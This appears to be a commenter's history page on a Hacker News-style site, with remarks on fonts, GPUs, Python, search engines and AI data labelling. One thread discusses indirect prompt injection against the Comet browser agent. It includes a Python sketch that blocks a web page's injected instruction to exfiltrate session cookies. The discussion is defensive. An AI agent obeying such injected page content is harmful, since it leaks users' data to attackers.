Readit News
rtrgrd commented on Two Slice, a font that's only 2px tall   joefatula.com/twoslice.ht... · Posted by u/JdeBP
rtrgrd · 3 months ago
Very cool - note that lowercase b, l and h are the same
rtrgrd commented on Intel Arc Pro B50 GPU Launched at $349 for Compact Workstations   guru3d.com/story/intel-ar... · Posted by u/qwytw
williamdclt · 3 months ago
I don't really know what I'm talking about (whether about graphics cards or AI inference), but if someone figures out how to cut the compute needed for AI inference significantly, then I'd guess demand for graphics cards would suddenly drop?

Given how young and volatile this domain still is, it doesn't seem unreasonable to be wary of it. Big players (Google, OpenAI and the like) are probably pouring tons of money into trying to do exactly that.

rtrgrd · 3 months ago
I would suspect that for self-hosted LLMs, quality >>> performance, so newer releases will always expand to fill the capacity of available hardware even as efficiency improves.
rtrgrd commented on Novel hollow-core optical fiber transmits data faster with record low loss   phys.org/news/2025-09-hol... · Posted by u/Wingy
rtrgrd · 4 months ago
All the hedge funds sniping orders right now lol
rtrgrd commented on Use Bayes rule to mechanically solve probability riddles   cloud.disroot.org/s/Ec4xT... · Posted by u/zaik
rtrgrd · 4 months ago
Might be the hug of death, but the load times are horrifically slow.
rtrgrd commented on Agentic Browser Security: Indirect Prompt Injection in Perplexity Comet   brave.com/blog/comet-prom... · Posted by u/drak0n1c
veganmosfet · 4 months ago
As a possible mitigation, they mention "The browser should distinguish between user instructions and website content". I don't see how this can be achieved reliably with LLMs, tbh. You can add fancy instructions (e.g., "You MUST NOT..."), delimiters (e.g., "<non_trusted>"), and fine-tune the LLM, but this is not reliable, since instructions and data are processed in the same context and in the same way. There are hundreds of examples out there. The only reliable countermeasures sit outside the LLM, but they restrain agent autonomy.
rtrgrd · 4 months ago
The blog mentions checking each agent action (say the agent plans to send a malicious HTTP request) against the user prompt for coherence; the attack vector still exists, but it should make the trivial versions of instruction injection harder.
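
For illustration, a minimal Python sketch of that kind of action check. The names (AgentAction, check_coherence) and the substring heuristic are made up for the example; a real agent would presumably use a separate classifier or model call, and this is not Brave's or Perplexity's actual design.

    from dataclasses import dataclass

    @dataclass
    class AgentAction:
        kind: str      # e.g. "http_request", "click", "fill_form"
        target: str    # e.g. a URL or CSS selector
        payload: str   # data the action would send

    def check_coherence(user_prompt: str, action: AgentAction) -> bool:
        """Return True if the action plausibly serves the user's request.

        A real agent would ask a separate model (or a rule engine) whether this
        action is expected given only the user's instruction, and block or ask
        for confirmation on a negative answer. The substring check below is just
        a stand-in so the example runs.
        """
        if action.kind == "http_request" and action.target not in user_prompt:
            return False
        return True

    def execute_plan(user_prompt: str, planned_actions: list) -> None:
        for action in planned_actions:
            if check_coherence(user_prompt, action):
                print(f"allowed: {action.kind} -> {action.target}")
            else:
                print(f"blocked: {action.kind} -> {action.target}")  # or confirm with the user

    # A page-injected instruction tries to exfiltrate data via an extra request.
    execute_plan(
        "Summarise the article on example.com",
        [
            AgentAction("http_request", "example.com", ""),
            AgentAction("http_request", "attacker.invalid/steal?d=...", "session cookies"),
        ],
    )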
rtrgrd commented on Crimes with Python's Pattern Matching (2022)   hillelwayne.com/post/pyth... · Posted by u/agluszak
umgefahren · 4 months ago
Idk, that doesn't sound so dubious to me. ∅ might be more approachable for the PhDs than set() ;)
rtrgrd · 4 months ago
we all love non-ASCII code (cough, emoji variable names)
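
As an aside, a small Python illustration (mine, not from the article) of what the interpreter actually allows: identifiers may use Unicode letters per PEP 3131, but a math symbol like ∅ or an emoji is not a legal name, and matching an empty set takes a class pattern plus a guard.

    # Python identifiers may use Unicode letters (PEP 3131), so Greek works,
    # but U+2205 EMPTY SET and emoji are symbols, not letters, so neither is
    # a legal variable name.
    α = {1, 2, 3}      # fine
    # ∅ = set()        # SyntaxError: invalid character '∅' (U+2205)
    # 😀 = set()        # SyntaxError: invalid character '😀' (U+1F600)

    # match/case requires Python 3.10+
    match α:
        case set() if not α:    # class pattern plus guard: only an empty set
            print("empty set")
        case set():
            print("non-empty set")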
rtrgrd commented on AI groups spend to replace low-cost 'data labellers' with high-paid experts   ft.com/content/e17647f0-4... · Posted by u/eisa01
Melonololoti · 5 months ago
Yepp, it continues the gathering of more and better data.

AI is not just hype. We have started to actually do something with all the data, and this process will not stop soon.

Alone, the RL that is now happening through human feedback (thumbs up/down) is massive.

rtrgrd · 5 months ago
I thought human preferences were typically considered a noisy reward signal.
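
To make "noisy" concrete, a toy sketch (my own illustration, not from the article): under a Bradley-Terry-style preference model, a thumbs-up/down label only records which of two responses a rater preferred, with probability sigmoid(r_a - r_b), so comparisons between similarly good responses come out close to a coin flip.

    import math
    import random

    def preference_prob(reward_a: float, reward_b: float) -> float:
        """Bradley-Terry: probability a rater prefers response A over B."""
        return 1.0 / (1.0 + math.exp(-(reward_a - reward_b)))

    def simulate_labels(reward_a: float, reward_b: float, n: int = 1000) -> float:
        """Fraction of simulated raters who pick A; the rest contradict it."""
        p = preference_prob(reward_a, reward_b)
        return sum(random.random() < p for _ in range(n)) / n

    random.seed(0)
    # Two responses of only slightly different "true" quality: labels are close
    # to a coin flip, so a reward model trained on them sees a lot of noise.
    print(simulate_labels(0.2, 0.0))   # roughly 0.55
    print(simulate_labels(2.0, 0.0))   # roughly 0.88, still not deterministic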
rtrgrd commented on How I Use Kagi   flamedfury.com/posts/how-... · Posted by u/moebrowne
rtrgrd · 5 months ago
I've never used Kagi before and wanted to try it: how does Kagi stack up against Brave Search?
rtrgrd commented on Cloudflare to introduce pay-per-crawl for AI bots   blog.cloudflare.com/intro... · Posted by u/scotchmi_st
boplicity · 6 months ago
Not sure how Google is winning at AI, at least from the sophisticated consumer's perspective. Their AI Overviews are often comically wrong. Sure, they may have good APIs and good technical quality for their AIs, but for the general user, their most common AI presentation is woefully bad.
rtrgrd · 6 months ago
I assume the high volume of search traffic forces Google to use a low-quality model for AI Overviews. Frontier Google models (e.g. Gemini 2.5 Pro) are on par with, if not 'better' than, the leading models from other companies.

u/rtrgrd

Karma: 45 · Cake day: October 12, 2024